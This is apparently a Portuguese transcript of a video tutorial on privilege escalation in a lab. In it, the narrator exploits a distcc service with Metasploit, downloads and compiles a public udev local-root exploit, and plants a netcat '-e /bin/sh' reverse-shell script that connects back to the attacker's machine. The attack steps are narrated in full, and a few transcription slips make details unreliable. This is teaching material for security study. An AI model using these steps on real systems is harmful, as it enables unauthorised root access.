E aí, pessoal, vamos para o nosso segundo vídeo sobre exploração de vulnerabilidades com Kali, ok? Imagino que você já esteja com tudo certinho aí com o seu laboratório de hacking. O nosso servidor já está ok, o Kali também já está iniciado e boa caçada a todos. Para a gente começar, pessoal, vamos relembrar o nosso cenário, tá? Que é uma empresa que utiliza um ambiente virtual e o pentest vai ser realizado no servidor dessa empresa, tá? O tema que nós vamos abordar hoje é a escalada de privilégios, tá? Que consiste em ganhar acesso à máquina através do usuário comum e a partir de exploits realizados localmente, ganhar privilégios para o root, tá? Então, o meu servidor já está configurado, meu Kali Linux também já está prontinho aqui. Vou ingressar ele na rede e nós vamos iniciar o pentest de acordo com o ciclo de vida dele, ok? Primeira coisa que a gente vai fazer, ingressar o Kali na rede, já está ingressado. Vamos iniciar o processo verificando qual é o IP atribuído ao Kali, tá? Lembrando que nesse laboratório nós vamos ter somente duas máquinas, tá? Uma máquina que vai servir de atacante, que é o Kali Linux, e a máquina que vai servir de vítima, que é o nosso servidor, ok? Mas de toda forma, é interessante conhecer as ferramentas que fazem a parte de reconhecimento, tá? E aí nós vamos utilizar sempre o Nmap nas nossas práticas, tá? Primeira coisa que eu vou fazer é verificar através de um scamping quais os IPs quais os hosts que estão ativos na rede, tá? Só para a gente ter uma noção de como o Nmap funciona. Então eu vou utilizar a opção SP, certo? E aí eu posso fazer o escaneamento a partir de um range, eu posso fazer o escaneamento para um IP, ou posso fazer o escaneamento a partir de uma máscara de rede. Analisando o retorno do ifconfig, o IP atribuído ao Kali é o ponto 29 e meu broadcast é ponto 31. Tá? Isso configura uma rede que tem uma máscara de rede CIDR/24, ok? Então, executando o Nmap com essa configuração, ele vai me trazer os dois hosts ativos. É claro que ele vai escanear todos os 32 endereços IPs válidos. Como eu não quero esse processo inteiro, eu quero somente demonstrar o funcionamento do Nmap, eu vou cancelar a execução do Nmap. Nesse trabalho que a gente faz com o Nmap, é interessante a coleta de informações do nosso alvo, ok? A partir de agora, nós vamos fazer escaneamentos somente no meu host, certo? Então eu vou executar o Nmap com a opção SV, ou seja, para buscar a versão dos serviços que estão sendo executados em cada uma das portas, e a opção "-O", para trazer a versão do sistema operacional. O retorno do Nmap sempre vai me dar a porta, o estado dessa porta, o serviço atribuído à porta, e como estamos utilizando a opção "-SV", ele vai me trazer a versão do serviço atual. Tá? As portas elas podem ser abertas, fechadas ou filtradas. Geralmente, quando tem um firewall atuando em alguma porta, esse retorno vai ser fechado ou filtrado. Existem algumas técnicas que permitem que o Nmap burle o firewall para fazer o reconhecimento da porta. Ok? Então, vamos aguardar o retorno do Nmap. Se você quiser consultar o status atual, basta dar um Enter, que ele te dá esse retorno aqui, ok? Então, analisando aqui, eu tenho as portas abertas, certo? E as versões dos serviços. O meu servidor é um servidor Linux que está rodando o kernel entre 2.6.9 ou 2.6.33. A escalada de privilégios é um processo que pode
demandar exploits locais ou não, certo? Nesse caso, para esse exemplo que nós vamos abordar hoje, nós vamos fazer um exploit na porta dist cc, ok? Essa porta, ela vai me dar acesso a um serviço. Apesar da porta 36, 32, que é a dist cc, não ser mostrada no retorno do Nmap, é possível realizar o exploit dela, certo? Então, levantadas as informações, abra um outro terminal, e o primeiro passo antes de executar o MFS Console é iniciar o banco de dados Postgres, ok? Então, System Control, Start, PostgreSQL. Esse banco de dados Postgres tem todas as informações que eu preciso do MSF Console. O MFS Console é uma interface terminal do Meta Exploit Framework, que é uma ferramenta que se constitui de vários módulos. Então eu tenho módulos para exploits, eu tenho módulos de scanners, eu tenho módulos que vão me auxiliar para fazer post-exploit, eu tenho também shellcodes, payloads. Então, algumas dessas ferramentas serão utilizadas no processo, ok? O Metaexploit está já em execução, já estou no terminal dele, e aí nós vamos utilizar a ferramenta de busca do Metaexploit, certo? Eu posso combinar o comando search com algumas opções. Nesse momento, eu quero fazer o seguinte, eu quero fazer uma busca pelo nome de um exploit para dist cc, ok? Então, ele já me deu um retorno, e como você pode ver na descrição, é um daemon, ou seja, é um serviço do sistema Linux para execução de comandos. Sempre que eu quiser utilizar uma ferramenta do MSF Console, nós vamos fazer uso do comando use. Então, use exploit unix minsk distcc exec. Perceba a mudança do terminal, tá? E agora nós vamos dar uma olhada nas opções desse exploit com o comando show options, tá? Então, eu preciso configurar o meu alvo, ok? Alguns exploits necessitam de um payload, tá? Um payload é um código que vai me permitir a execução de comandos, ok? Sempre que eu quiser setar um payload ou setar uma configuração, configurá-la, nós vamos utilizar o set. Nesse caso, eu vou configurar um payload. Set payload cmd. Como eu estou utilizando o tab para autocompletar, ele demora um pouco, ok? E Unix bind. Vamos primeiro mostrar as opções, tá? Todas as opções que apareceram na tela aí são opções de payloads para a linha de comando do Linux, tá? Ou de sistemas Unix, ok? Eu prefiro usar o BindRub, mas você pode escolher outro. Para essa prática seria interessante o BindRub. Vamos novamente olhar as configurações. Então perceba, eu preciso agora indicar qual é o meu alvo. E o que esse payload faz? Ele vai criar uma seção na porta 3632 e vai fazer um reverse, vai passar a conexão para a porta 444, ok? Então vamos configurar set rhost 10.10.10.1. Sempre que eu quiser executar um comando, eu vou utilizar run ou exploit, ok? Então, no momento que eu começo o meu exploit, eu consigo abrir uma conexão, tá, com o servidor a partir da porta que foi indicada. Nesse momento, eu já
posso começar a capturar algumas informações, como o quê? O comando pwd é o Print Work Directory. Então, no momento que eu executo esse comando, ele vai me dar qual é a pasta que eu estou conectado. A pasta que eu ganhei acesso no servidor, que é a pasta temporária. Ok? Outro comando interessante é o whoIam, que ele diz qual é o usuário. Então, perceba que eu estou como um usuário, como um daemon, como um serviço, certo? E para a gente realmente terminar essa parte de documentação, eu posso executar um name-a, que aí ele vai me trazer as informações do servidor. Nesse momento, eu não vou conseguir fazer muita coisa como um serviço, mas eu posso começar a preparar a minha escalada de privilégios, ok? Vamos então preparar a nossa escalada de privilégios, ok? Eu já estou na pasta alvo do exploit, que é a pasta temp. Então, nós vamos realizar o download de um arquivo utilizando o binário wget com a opção nocheck certificate. Esse arquivo ele está lá no exploit database, ok? Então, http://www.exploitdatabase.com/download/8572, certo? Mas eu já quero salvar esse arquivo no formato C, utilizando a ferramenta wget, ok? Então, deu Enter, aguarde alguns segundos, tá? Para ele poder realizar o download. Apesar da gente estar numa seção shell, a gente não está tendo o retorno das informações, ok? Liste os arquivos e eu vou ter ali o pandora.c. Retorno. Esse arquivo pandora.c, retorno. Esse arquivo pandora.c, nós vamos compilar ele utilizando o GCC, ok? Pandora.c -o, opção de saída, para o arquivo Pandora, e eu vou utilizar a opção pthread, certo? Pausa. Retorno. Aguarde um pouquinho. E aí liste novamente os arquivos. Então perceba agora que eu tenho pandora.c e o Pandora. Certo? Você vai tornar esse arquivo executável. chmod mais x Pandora. Previamente, eu já tinha criado o arquivo run, tá? Eu vou deletá-lo, tá? E aí nós vamos refazer, eu vou refazer o processo, ok? Como é que vai começar o processo da minha escalada? Já fiz o download do arquivo, compilei o arquivo, tornei ele executável. Eu preciso agora inserir nesse arquivo run algumas informações, ok? Então, echo bin sh, porque eu quero tornar esse arquivo um shell script, ok? Então, todo shell script ele inicia com a instrução jogo da velha, exclamação, e o shell que eu quero usar. Após isso, eu vou criar a instrução que eu quero que esse script execute. Então, eu vou utilizar o binário do netcat com a opção "-e", para transformar a execução do netcat em um shell, tá? bin /sh, o endereço IP da minha máquina, da máquina atacante, e a porta que eu vou escutar. Isso eu vou adicionar
ao final do arquivo com o maior. Temp run. Vamos abrir outro terminal. Em outro terminal, eu vou iniciar a escuta do Netcat. Listen na porta 1, 2, 3, 4, 5. Então, eu já estou ouvindo conexões nessa porta, ok? Vou retornar ao terminal anterior. E qual é a grande sacada desse exploit? Ele vai utilizar serviços do UDEV para escalar o privilégio, ok? Então, para isso, eu vou pesquisar os processos do UDEV com o comando ps e vou concatenar ele usando um pipe com o grep para filtrar a saída, e eu quero só os serviços que estejam marcados como UDEV. Então, perceba que ele me retornou um serviço que o dono é o root e retornou o meu próprio serviço do UDEV. O meu próprio serviço do daemon com o PS que eu fiz. Todo serviço no Linux, ele é executado como um fork. Ele cria o serviço principal e a execução ele é criada para o usuário ter acesso. Tá? Esse exploit ele tem que usar o serviço original. Então você vai pegar o seu PID, que é o Process Identifier, e vai diminuir 1. Tá? Então eu vou executar o meu arquivo Pandora e o meu processo vai ser o 2356. Ok? Vou dar Enter e vou retornar ao meu outro terminal para guardar a conexão com a máquina da vítima. Certo? Talvez ele demore alguns segundos para estabelecer a conexão, mas geralmente não demora muito. Então, conectei a máquina da vítima. Para a gente fazer o POC e garantir que eu esteja realmente conectado como root, vamos começar agora. Eu vou primeiro listar o diretório onde eu estou, diretório raiz. Vou buscar informações da máquina com o name-a. Ok, estou logado no servidor. E agora, vou antes disso também listar as configurações de rede, ifconfig. E por fim, para a gente documentar todo esse processo, who I am, root. Então, esse processo aqui constitui a prova de conceito. Você vai pegar tudo isso, colar no arquivo como prova do conceito, ok? Vamos repassar o nosso exploit? Vamos lá. Desde a fase de reconhecimento. A partir do ifconfig, eu pude detectar o meu endereço IP e o tamanho da minha rede. Com o Nmap, eu fiz um escaneamento dos hosts ativos, utilizando a máscara de rede /24. Detectei que eu tinha 2 IPs na rede. Certo? Fiz um scan das versões com o sistema operacional do meu alvo e ele me retornou as portas abertas. Decidimos atacar a porta dist-cc, que é uma porta de serviço do Linux, ok? Configurei um payload, tá? Que foi o cmd unix bind_ruby. Configurei o meu host, executei o exploiter. E aí ele fez um bind handler para a máquina da vítima, me permitindo acesso. Esse exploit em especial ele já me coloca na pasta alvo, que é a pasta temp. Verifiquei qual era o usuário logado no momento, é um daemon, ou seja, é um serviço. Verifiquei se a máquina realmente era o meu servidor, ok? E aí preparei a escalada de privilégios. Fiz o download de um arquivo do exploit DB
que é um exploit local que utiliza o dev como porta de entrada. Compilei esse arquivo, tornei-o executável, criei um arquivo chamado run, onde eu inseri o início de um shell script e a instrução netcat que me permite tomar o shell, tá, da máquina com o meu IP e a minha porta. Pesquisei serviços que sejam do root e que utilizem o dev. E ele me retornou o serviço com o PID 2357. Como eu preciso acessar o serviço pai, diminuí e executei o Pandora com o PID do serviço. Em outro terminal, iniciei a escuta do netcat, aguardei a conexão da máquina da vítima, printei o diretório atual, busquei informações sobre a máquina, busquei informações sobre a rede e busquei informações sobre o usuário. Ok? Então, fica aí mais um estudo de caso interessante, escalada de privilégio. Desejo a todos aí bons estudos e um forte abraço.